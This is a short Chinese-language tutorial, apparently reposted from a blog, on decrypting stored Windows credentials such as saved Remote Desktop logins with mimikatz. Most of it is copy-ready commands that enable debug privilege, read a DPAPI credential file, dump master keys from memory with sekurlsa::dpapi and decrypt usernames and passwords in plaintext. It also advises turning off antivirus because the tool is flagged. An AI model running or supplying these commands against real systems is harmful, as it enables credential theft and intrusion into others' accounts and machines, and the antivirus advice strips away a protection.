参考链接：https://blog.csdn.net/qq_36618918/article/details/130677478
使用的工具：mimikatz

前言

该方式适用于获取系统存储的凭证中的用户名和密码，不仅限于远程桌面的凭证。

使用的工具是mimikatz，杀软会报毒拦截，下载及使用的时候可以推出杀软
下载地址：https://gitcode.net/mirrors/gentilkiwi/mimikatz/-/release

操作

打开系统目录查看有哪些凭证文件

记录下要操作的文件名：78F88D66269E4A4100E35E1A9C3F8266
获取guidMasterKey
进入到mimikatz.exe的目录，执行

mimikatz.exe "privilege::debug" "dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\78F88D66269E4A4100E35E1A9C3F8266" exit

其中C:\Users\Administrator\AppData\Local\Microsoft\Credentials\78F88D66269E4A4100E35E1A9C3F8266替换为自己的

复制出其中的guidMasterKey db374c7f-b7fb-4a36-b954-893ca6ef2ade
3. 根据guidMasterKey找到对应Masterkey

mimikatz.exe "privilege::debug" "sekurlsa::dpapi" exit > 1.txt

执行后会在mimikatz目录生成1.txt文件，在其中查找上面获得的guidMasterKey内容，然后复制出Masterkey

4. 解密获取明文

mimikatz.exe "privilege::debug" "dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\78F88D66269E4A4100E35E1A9C3F8266 /masterkey:ec313e2dbc25445cb392dc6e00696b0c3614e52915599b68857e4c50384373a9baa8043f9135d55543b431a1002225322d2b486cb3659c5ef20379d08a852a59" exit

使用上面的文件名和获得的Masterkey替换上面命令中的部分，执行后可以看到用户名和密码